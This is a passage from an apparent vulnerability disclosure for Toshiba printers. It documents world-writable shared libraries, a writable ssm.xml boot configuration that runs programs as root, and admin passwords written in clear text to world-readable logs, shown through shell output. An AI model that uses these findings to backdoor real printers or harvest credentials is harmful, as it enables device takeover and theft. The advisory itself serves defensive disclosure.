/mfp/lib/libmfpcommonwrapper.so.0 (0x77682000)  
libcrypto.so.1.0.0 =>  
/home/SYSROM_SRC/build/release/lib/libcrypto.so.1.0.0 (0x77420000)  
libstdc++.so.6 => /usr/lib/libstdc++.so.6 (0x4c04f000)  
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x4c14b000)  
libintlc.so.5 => /usr/lib/libintlc.so.5 (0x773c3000)  
libsvml.so => /mfp/lib/libsvml.so (0x76ba9000)  
libc.so.6 => /lib/libc.so.6 (0x4bc67000)  
libdl.so.2 => /lib/libdl.so.2 (0x4bdaf000)  
libllmnrclient.so =>  
/home/SYSROM_SRC/build/release/lib/libllmnrclient.so (0x76b95000)  
/lib/ld-linux.so.2 (0x4bc47000)  
libsqlite.so.0 =>  
/home/SYSROM_SRC/build/release/lib/libsqlite.so.0 (0x76b35000)  
libcpanel.so.0 => /mfp/lib/libcpanel.so.0 (0x76b0e000)  
libcimsg.so =>  
/home/SYSROM_SRC/build/release/lib/libcimsg.so (0x76b02000)  
libcissmclient.so =>  
/home/SYSROM_SRC/build/release/lib/libcissmclient.so (0x76ae8000)  
libacl.so.1 => /lib/libacl.so.1 (0x4bdd7000)  
librt.so.1 => /lib/librt.so.1 (0x4be15000)  
libm.so.6 => /lib/libm.so.6 (0x76abf000)  
libssdk.so.0 =>  
/home/SYSROM_SRC/build/release/lib/libssdk.so.0 (0x75f1e000)  
libcihdb.so =>  
/home/SYSROM_SRC/build/release/lib/libcihdb.so (0x75e56000)  
libattr.so.1 => /lib/libattr.so.1 (0x4bdd0000)  
libpam.so.0 => /lib/libpam.so.0 (0x75e4a000)  
libldap-2.4.so.2 =>  
/home/SYSROM_SRC/build/release/lib/libldap-2.4.so.2 (0x75e12000)  
libssl.so.1.0.0 =>  
/home/SYSROM_SRC/build/release/lib/libssl.so.1.0.0 (0x75da6000)  
libk5crypto.so.3 => /usr/lib/libk5crypto.so.3 (0x75d84000)  
libresolv.so.2 => /lib/libresolv.so.2 (0x4c164000)  
libext2fs.so.2 => /usr/lib/libext2fs.so.2 (0x75d5a000)  
libuuid.so.1 => /usr/lib/libuuid.so.1 (0x4be0f000)  
libkrb5support.so.0 => /usr/lib/libkrb5support.so.0 (0x75d53000)  
libkrb5.so.25 =>  
/home/SYSROM_SRC/build/release/lib/libkrb5.so.25 (0x75ce2000)  
libgssapi.so.2 =>  
/home/SYSROM_SRC/build/release/lib/libgssapi.so.2 (0x75cae000)  
libCryptolib.so.0 =>  
/home/SYSROM_SRC/build/release/lib/libCryptolib.so.0 (0x75c2b000)  
libirng.so => /usr/lib/libirng.so (0x75c22000)  
libcilkrts.so.5 => /usr/lib/libcilkrts.so.5 (0x75bee000)  
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x4c403000)  
libcrypt.so.1 => /lib/libcrypt.so.1 (0x75bbc000)  
liblber-2.4.so.2 =>  
/home/SYSROM_SRC/build/release/lib/liblber-2.4.so.2 (0x75bb0000)  
libsasl2.so.2 =>  
/home/SYSROM_SRC/build/release/lib/libsasl2.so.2 (0x75b8c000)  
libcom_err.so.2 => /usr/lib/libcom_err.so.2 (0x4bdee000)  
libhx509.so.5 =>  
/home/SYSROM_SRC/build/release/lib/libhx509.so.5 (0x75b4b000)  
libheimsqlite.so.0 =>  
/home/SYSROM_SRC/build/release/lib/libheimsqlite.so.0 (0x75ad7000)  
libhcrypto.so.4 =>  
/home/SYSROM_SRC/build/release/lib/libhcrypto.so.4 (0x75aa4000)  
libasn1.so.8 =>  
/home/SYSROM_SRC/build/release/lib/libasn1.so.8 (0x75a02000)  
libwind.so.0 =>  
/home/SYSROM_SRC/build/release/lib/libwind.so.0 (0x759da000)  
libcom_err.so.1 =>  
/home/SYSROM_SRC/build/release/lib/libcom_err.so.1 (0x759d6000)  
libroken.so.18 =>  
/home/SYSROM_SRC/build/release/lib/libroken.so.18 (0x759c2000)  
libheimntlm.so.0 =>  
/home/SYSROM_SRC/build/release/lib/libheimntlm.so.0 (0x759bc000)  
bash-4.1#  
  
We can find these 31 insecure libraries:  
  
- - /home/SYSROM_SRC/build/release/lib/libciindexeddb.so.0  
- - /home/SYSROM_SRC/build/release/lib/libsyscallerr.so.0  
- - /home/SYSROM_SRC/build/release/lib/libcios.so.0  
- - /mfp/lib/libatawrapper.so.0.0  
- - /mfp/lib/libmfpcommonwrapper.so.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libcrypto.so.1.0.0  
- - /mfp/lib/libsvml.so  
- - /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6  
- - /mfp/lib/libcpanel.so.0.0  
- - /home/SYSROM_SRC/build/release/lib/libcimsg.so.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6  
- - /home/SYSROM_SRC/build/release/lib/libcimsg.so.0  
- - /home/SYSROM_SRC/build/release/lib/libcissmclient.so.0  
- - /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0  
- - /home/SYSROM_SRC/build/release/lib/libcihdb.so.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6  
- - /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libgssapi.so.2.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0  
- - /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0  
- - /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/liblber-2.4.so.2.5.6  
- - /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3  
- - /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0  
- - /home/SYSROM_SRC/build/thirdparty/lib/libheimntlm.so.0.1.0  
  
The permissions of these libraries are insecure. A remote attacker can  
overwrite them and achieve Remote Code Execution:  
  
-rwxrwxrwx 1 root root 322261 Dec 6 01:41  
/home/SYSROM_SRC/build/release/lib/libciindexeddb.so.0  
-rwxrwxrwx 1 root root 343680 Dec 6 01:48  
/home/SYSROM_SRC/build/release/lib/libsyscallerr.so.0  
-rwxrwxrwx 1 root root 566991 Dec 6 01:41  
/home/SYSROM_SRC/build/release/lib/libcios.so.0  
-rwxrwxrwx 1 root root 139986 Sep 19 2019 /mfp/lib/libatawrapper.so.0.0  
-rwxrwxrwx 1 root root 38330 May 28 2019  
/mfp/lib/libmfpcommonwrapper.so.0.0  
-rwxrwxrwx 1 apache messagebus 2765203 Dec 6 01:28  
/home/SYSROM_SRC/build/thirdparty/lib/libcrypto.so.1.0.0  
-rwxrwxrwx 1 root root 9479623 Apr 25 2014 /mfp/lib/libsvml.so  
-rwxrwxrwx 1 root root 95211 Dec 6 02:00  
/home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0  
-rwxrwxrwx 1 root root 744984 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6  
-rwxrwxrwx 1 root root 48131 Apr 8 2019 /mfp/lib/libcpanel.so.0.0  
-rwxrwxrwx 1 root root 58976 Dec 6 01:41  
/home/SYSROM_SRC/build/release/lib/libcimsg.so.0  
-rwxrwxrwx 1 root root 744984 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6  
-rwxrwxrwx 1 root root 58976 Dec 6 01:41  
/home/SYSROM_SRC/build/release/lib/libcimsg.so.0  
-rwxrwxrwx 1 root root 127850 Dec 6 01:41  
/home/SYSROM_SRC/build/release/lib/libcissmclient.so.0  
-rwxrwxrwx 1 root root 14101772 Dec 6 01:40  
/home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0  
-rwxrwxrwx 1 root root 909064 Dec 6 01:41  
/home/SYSROM_SRC/build/release/lib/libcihdb.so.0  
-rwxrwxrwx 1 root root 269392 Dec 6 01:34  
/home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6  
-rwxrwxrwx 1 apache messagebus 485480 Dec 6 01:28  
/home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0  
-rwxrwxrwx 1 root root 251701 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libgssapi.so.2.0.0  
-rwxrwxrwx 1 root root 539700 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0  
-rwxrwxrwx 1 root root 624082 Dec 6 04:53  
/home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0  
-rwxrwxrwx 1 root root 624082 Apr 20 2018  
/home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0.0.0  
-rwxrwxrwx 1 root root 60708 Dec 6 01:34  
/home/SYSROM_SRC/build/thirdparty/lib/liblber-2.4.so.2.5.6  
-rwxrwxrwx 1 root root 324233 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0  
-rwxrwxrwx 1 root root 525228 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0  
-rwxrwxrwx 1 root root 225346 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0  
-rwxrwxrwx 1 root root 759349 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0  
-rwxrwxrwx 1 root root 166289 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0  
-rwxrwxrwx 1 root root 14571 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3  
-rwxrwxrwx 1 root root 92942 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0  
-rwxrwxrwx 1 root root 24134 Dec 6 01:27  
/home/SYSROM_SRC/build/thirdparty/lib/libheimntlm.so.0.1.0  
  
An attacker can remotely compromise any Toshiba printer.  
  
The libraries (more than hundreds) used by these programs can be  
replaced by malicious libraries by any local or remote attacker.  
  
  
  
## Details - Local Privilege Escalation and Remote Code Execution using CISSM  
  
It was observed that the `cissm` program runs as root inside the  
printers. This Toshiba-specific program will start children processes  
as shown below, based on the content of the  
`/home/SYSROM_SRC/build/common/bin/ssm.xml` XML file stored in the  
printer:  
  
bash-4.1# ps auxw | grep cissm  
root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02  
./cissm -T 7 -d ssm.xml  
bash-4.1# pstree  
[...]  
|-cissm-+-alAddressBookMg  
| |-alCloning  
| |-alExportImport  
| |-alLogRetriever  
| |-alLogmanager---{alLogmanager}  
| |-alPanelStartLED---{alPanelStartLE}  
| |-alPanelUIMessag---{alPanelUIMessa}  
| |-alServiceUIPlug  
| |-alUiFrameWork---24*[{alUiFrameWork}]  
| |-alViewPlugin---3*[{alViewPlugin}]  
| |-alaccountmgr---2*[{alaccountmgr}]  
| |-alappmanager-+-2*[python---5*[{python}]]  
| | `-15*[{alappmanager}]  
| |-alboserver---7*[{alboserver}]  
| |-alcbamanager---26*[{alcbamanager}]  
| |-aldevauthmgmtpl  
| |-aldeviceconfigp  
| |-aldeviceservice---{aldeviceservic}  
| |-aleFilingmgr  
| |-alfilestoragem  
| |-algrpmgr  
| |-alhddalertmgr  
| |-alhddbackuprest  
| |-alhomedatamgr  
| |-alifaxreceive  
| |-alintegritychkm  
| |-aljobcontroller---8*[{aljobcontrolle}]  
[...]  
  
The XML configuration file used by cissm is located at  
`/home/SYSROM_SRC/build/thirdparty/bin/ssm.xml` and has insecure  
permissions:  
  
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/ssm.xml  
/home/SYSROM_SRC/build/thirdparty/bin/ssm.xml  
/home/SYSROM_SRC/build/common/bin/ssm.xml  
-rwxrwxrwx 1 root root 55245 Oct 7 2021  
/home/SYSROM_SRC/build/common/bin/ssm.xml  
lrwxrwxrwx 1 root root 28 Mar 14 16:27  
/home/SYSROM_SRC/build/release/bin/ssm.xml ->  
../../thirdparty/bin/ssm.xml  
lrwxrwxrwx 1 root root 24 Mar 14 16:27  
/home/SYSROM_SRC/build/thirdparty/bin/ssm.xml ->  
../../common/bin/ssm.xmlroot  
  
This file is used to run program as root when the printer starts and  
can be used to redefine any program running as root when the printer  
boots. This program also runs every 3 minute.  
  
An attacker can remotely write an additional entry to start a  
malicious command that will be executed as root when the printer  
boots:  
  
Content of `/home/SYSROM_SRC/build/common/bin/ssm.xml`:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<SSM xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xsi:noNamespaceSchemaLocation="../../../LayerInterface/CI/ServiceStartupManager/SSM.xsd">  
<!-- Start: CI Layer services -->  
<Service>  
<name>cischeduler</name>  
<group/>  
<exePath>./cischeduler</exePath>  
<startupType>Automatic</startupType>  
<enabled>1</enabled>  
<ProcessGroup>TRUSTED</ProcessGroup>  
<StartParameters>  
<Param>-S</Param>  
<Param>ramdisk</Param>  
<Param>></Param>  
<Param>/work/log/ci/cischeduler.log</Param>  
</StartParameters>  
</Service>  
<Service>  
<name>cipollproc</name>  
<group/>  
<exePath>./cipollproc</exePath>  
<startupType>Automatic</startupType>  
<enabled>1</enabled>  
<ProcessGroup>TRUSTED</ProcessGroup>  
<StartParameters>  
<Param>></Param>  
<Param>/work/log/ci/cipollproc.log</Param>  
</StartParameters>  
<StartupCondition>  
<Condition>  
<Service name="cischeduler" state="Ready"></Service>  
</Condition>  
</StartupCondition>  
</Service>  
[...]  
  
Analysis of `pspy32` running on the printer:  
  
2023/05/27 20:32:43 CMD: UID=0 PID=4228 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:43 CMD: UID=0 PID=4229 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:46 CMD: UID=0 PID=4230 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:46 CMD: UID=0 PID=4231 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:50 CMD: UID=0 PID=4232 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:50 CMD: UID=0 PID=4233 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:53 CMD: UID=0 PID=4234 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:53 CMD: UID=0 PID=4235 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:56 CMD: UID=0 PID=4236 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:32:56 CMD: UID=0 PID=4237 | ./cissm -T 7 -d ssm.xml  
2023/05/27 20:32:56 CMD: UID=0 PID=4238 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
[...]  
2023/05/27 20:35:26 CMD: UID=0 PID=4393 | ./cissm -T 7 -d ssm.xml  
[...]  
2023/05/27 20:37:56 CMD: UID=0 PID=4532 | ./cissm -T 7 -d ssm.xml  
[...]  
2023/05/27 20:39:56 CMD: UID=0 PID=4676 | ./cissm -T 7 -d ssm.xml  
[...]  
2023/05/27 20:42:19 CMD: UID=0 PID=4831 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:19 CMD: UID=0 PID=4832 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:22 CMD: UID=0 PID=4833 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:22 CMD: UID=0 PID=4834 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:25 CMD: UID=0 PID=4835 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:25 CMD: UID=0 PID=4836 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:26 CMD: UID=0 PID=4837 | ./cissm -T 7 -d ssm.xml  
2023/05/27 20:42:27 CMD: UID=0 PID=4839 | sh -c ps -eo  
stat,comm | grep -e "^Z.*agent" -e "^Z.*ebx_dl" -e "^Z.*de_ipfax"  
2023/05/27 20:42:27 CMD: UID=0 PID=4838 | sh -c ps -eo  
stat,comm | grep -e "^Z.*agent" -e "^Z.*ebx_dl" -e "^Z.*de_ipfax"  
2023/05/27 20:42:29 CMD: UID=0 PID=4840 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:29 CMD: UID=0 PID=4841 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:32 CMD: UID=0 PID=4842 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 20:42:32 CMD: UID=0 PID=4843 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
[...]  
</pre>  
  
An attacker can remotely compromise any Toshiba printer.  
  
The `/home/SYSROM_SRC/build/common/bin/ssm.xml` configuration file can  
be replaced by any local or remote attacker to run any malicious  
program as root when the printer starts.  
  
Attackers can backdoor the printer.  
  
  
  
## Details - Passwords stored in clear-text logs and insecure logs  
  
It was observed that passwords are stored in clear-text logs.  
  
Some logs are stored inside the `/ramdisk/work/log/al` directory with  
insecure permissions, allowing any local attacker to read and modify  
these files:  
  
bash-4.1# ls -laR /ramdisk/work/log/al/*  
-rw-rw-rw- 1 root trusted 42678 May 23 16:10  
/ramdisk/work/log/al/accounting.log.0.txt  
-rw-rw-rw- 1 root trusted 2228 May 23 15:14  
/ramdisk/work/log/al/address.log.0.txt  
-rw-rw-rw- 1 root trusted 6877 May 23 15:16  
/ramdisk/work/log/al/alPanelStartLEDHandler.log.0.txt  
-rw-rw-rw- 1 root trusted 23536 May 23 16:10  
/ramdisk/work/log/al/alPanelUIMessageHandler.log.0.txt  
-rw-rw-rw- 1 root trusted 79 May 23 15:14  
/ramdisk/work/log/al/albluetooth.log.0.txt  
-rw-rw-rw- 1 root trusted 449 May 23 15:14  
/ramdisk/work/log/al/alcloning.log.0.txt  
-rw-rw-rw- 1 root trusted 1594 May 23 15:14  
/ramdisk/work/log/al/alcloudclient.log.0.txt  
-rw-rw-rw- 1 root trusted 987 May 23 15:14  
/ramdisk/work/log/al/aldevauthmgmtplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 307378 May 23 16:11  
/ramdisk/work/log/al/aldeviceconfig.log.0.txt  
-rw-rw-rw- 1 root trusted 29171 May 23 15:16  
/ramdisk/work/log/al/aldeviceservice.log.0.txt  
-rw-rw-rw- 1 root trusted 128 May 23 15:15  
/ramdisk/work/log/al/aleSCL.log.0.txt  
-rw-rw-rw- 1 root trusted 474 May 23 15:14  
/ramdisk/work/log/al/alexportimport.log.0.txt  
-rw-rw-rw- 1 root trusted 1437 May 23 15:14  
/ramdisk/work/log/al/alfilestoragem.log.0.txt  
-rw-rw-rw- 1 root trusted 13465 May 23 16:11  
/ramdisk/work/log/al/allicensemgmt.log.0.txt  
-rw-rw-rw- 1 root trusted 5380 May 23 15:14  
/ramdisk/work/log/al/almaintenanceplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 111 May 23 15:14  
/ramdisk/work/log/al/alnfcplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 4432 May 23 16:05  
/ramdisk/work/log/al/alulm.log.0.txt  
-rw-rw-rw- 1 root trusted 682 May 23 15:14  
/ramdisk/work/log/al/alvnclauncher.log.0.txt  
-rw-rw-rw- 1 root trusted 67235 May 23 16:08  
/ramdisk/work/log/al/appmanager.log.0.txt  
-rw-rw-rw- 1 root trusted 31306 May 23 16:11  
/ramdisk/work/log/al/authplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 590 May 23 15:15  
/ramdisk/work/log/al/bonjour.log.0.txt  
-rw-rw-rw- 1 root trusted 147834 May 23 16:15  
/ramdisk/work/log/al/boserver.log.0.txt  
-rwxrwxrwx 1 root trusted 250542 May 23 16:14  
/ramdisk/work/log/al/boserverEvent.log.28.txt  
-rw-rw-rw- 1 root trusted 1110 May 23 15:14  
/ramdisk/work/log/al/cbamanager.log.0.txt  
-rw-rw-rw- 1 root trusted 98 May 23 15:14  
/ramdisk/work/log/al/eBRlog.log.0.txt  
-rw-rw-rw- 1 root trusted 3311 May 23 15:15  
/ramdisk/work/log/al/efile.log.0.txt  
-rwxrwxrwx 1 root trusted 567 May 23 16:10  
/ramdisk/work/log/al/grpmgrplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 2277 May 23 16:10  
/ramdisk/work/log/al/hdm.log.0.txt  
-rw-rw-rw- 1 root trusted 206 May 23 15:15  
/ramdisk/work/log/al/ifaxrx.log.0.txt  
-rw-rw-rw- 1 root trusted 1037 May 23 15:14  
/ramdisk/work/log/al/jobcontroller.log.0.txt  
-rw-rw-rw- 1 root trusted 4714 May 23 15:41  
/ramdisk/work/log/al/jtm.log.0.txt  
-rw-rw-rw- 1 root trusted 610 May 23 15:15  
/ramdisk/work/log/al/logmanagerplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 286932 May 23 15:23  
/ramdisk/work/log/al/logretriever.log.0.txt  
-rw-rw-rw- 1 root trusted 214 May 23 15:15  
/ramdisk/work/log/al/network-ipv6.log.0.txt  
-rw-rw-rw- 1 root trusted 22498 May 23 15:16  
/ramdisk/work/log/al/nsm.log.0.txt  
-rw-rw-rw- 1 root trusted 169537 May 23 16:01  
/ramdisk/work/log/al/panel.log.0.txt  
-rw-rw-rw- 1 root trusted 3403 May 23 15:15  
/ramdisk/work/log/al/printmanager.log.0.txt  
-rw-rw-rw- 1 root trusted 26623 May 23 16:10  
/ramdisk/work/log/al/prm.log.0.txt  
-rw-rw-rw- 1 root trusted 1264 May 23 15:15  
/ramdisk/work/log/al/remoteApplication.log.0.txt  
-rw-rw-rw- 1 root trusted 565116 May 23 16:11  
/ramdisk/work/log/al/renderer.log.2.txt  
-rw-rw-rw- 1 root trusted 2434 May 23 15:14  
/ramdisk/work/log/al/reportmanager.log.0.txt  
-rw-rw-rw- 1 root trusted 426 May 23 15:14  
/ramdisk/work/log/al/reportmsgr.log.0.txt  
-rw-rw-rw- 1 root trusted 20834 May 23 16:11  
/ramdisk/work/log/al/restrictionmode.log.0.txt  
-rw-rw-rw- 1 root trusted 732 May 23 16:10  
/ramdisk/work/log/al/rolemanagerplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 12464 May 23 16:11  
/ramdisk/work/log/al/securitysettingsplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 19963 May 23 15:15  
/ramdisk/work/log/al/sharedprint.log.0.txt  
-rw-rw-rw- 1 root trusted 159 May 23 15:15  
/ramdisk/work/log/al/slp.log.0.txt  
-rw-rw-rw- 1 root trusted 798 May 23 15:15  
/ramdisk/work/log/al/snmpd.log.0.txt  
-rw-rw-rw- 1 root trusted 12287 May 23 15:15  
/ramdisk/work/log/al/stage2.log.0.txt  
-rw-rw-rw- 1 root trusted 5955 May 23 15:15  
/ramdisk/work/log/al/swupdate.log.0.txt  
-rw-rw-rw- 1 root trusted 2306 May 23 15:14  
/ramdisk/work/log/al/usb.log.0.txt  
-rw-rw-rw- 1 root trusted 1113 May 23 15:15  
/ramdisk/work/log/al/usbprn.log.0.txt  
-rw-rw-rw- 1 root trusted 14238 May 23 16:10  
/ramdisk/work/log/al/usermanagerplugin.log.0.txt  
-rw-rw-rw- 1 root trusted 2553 May 23 15:14  
/ramdisk/work/log/al/viewplugin.log.0.txt  
  
/ramdisk/work/log/al/epfx:  
total 28  
drwxrwxrwx 4 root trusted 0 May 23 15:14 .  
drwxrwxrwx 5 root trusted 0 May 23 16:10 ..  
-rwxrwxrwx 1 root trusted 28010 May 23 16:08 eprocessframework.log.0.txt  
drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1711  
drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1712  
  
/ramdisk/work/log/al/wsp:  
total 4  
drwxrwxrwx 2 root trusted 0 May 23 15:15 .  
drwxrwxrwx 5 root trusted 0 May 23 16:10 ..  
-rw-rw-rw- 1 root trusted 3600 May 23 16:14 alwsprint.log.0.txt  
  
/ramdisk/work/log/al/wsscn:  
total 4  
drwxrwxrwx 2 root trusted 0 May 23 15:15 .  
drwxrwxrwx 5 root trusted 0 May 23 16:10 ..  
-rw-rw-rw- 1 root trusted 1083 May 23 15:15 alwswsc.log.0.txt  
bash-4.1#  
  
  
  
### Clear-text password written in logs when an user logs into the printer  
  
When a user logs into the TopAccess web interface, the password will  
be written in logs that are world-readable as shown below.  
  
Login as admin with the password `PASSWORD-SECRET-PIERRE`, we can see  
the password saved into 2 log files that are world-readable:  
  
- - `/ramdisk/work/log/al/boserverEvent.log.*.txt`  
- - `/ramdisk/al/network/log/http.log`  
  
Leak of credentials inside the log files:  
  
bash-4.1# grep -ri PIER .  
./work/log/al/boserverEvent.log.28.txt:<Evt><t>05/27  
16:18:39443877</t><Set><sID>ContentWebServer_10.0.0.2.fda0f003cf95b852233893df36d9b1ff</sID><pID>8556</pID><pName>httpd</pName><SetValue><Payload  
XMLPayLoad = "true" overrideDelta =  
"true"><path></path><value><Authentication><UserCredential><userName>admin</userName><passwd>PASSWORD-SECRET-PIERRE</passwd><ipaddress>10.0.0.2</ipaddress><DepartmentManagement  
isEnable="false"><requireDepartment/></DepartmentManagement><domainName/><applicationType>TOP_ACCESS</applicationType></UserCredential></Authentication></value></Payload></SetValue></Set></Evt>  
./al/network/log/http.log:[Fri May 27 16:18:39.519454 2023]  
[contentwebserver:debug] [pid 8556] ccontentwebserver.cpp(4175):  
[client 10.0.0.2:41700] PASSWORD-SECRET-PIERRE, referer:  
http://10.0.0.1:8080/TopAccessLogin.html?v=1670282309ta  
  
These files have insecure permissions allowing any user to retrieve  
the passwords and to modify the logs.  
  
The files can be also modified by a remote attacker using the  
Pre-authenticated Remote Code Execution as root or apache and multiple  
Local Privilege Escalations vulnerability.  
  
bash-4.1# ls -la /ramdisk/al/network/log/http.log  
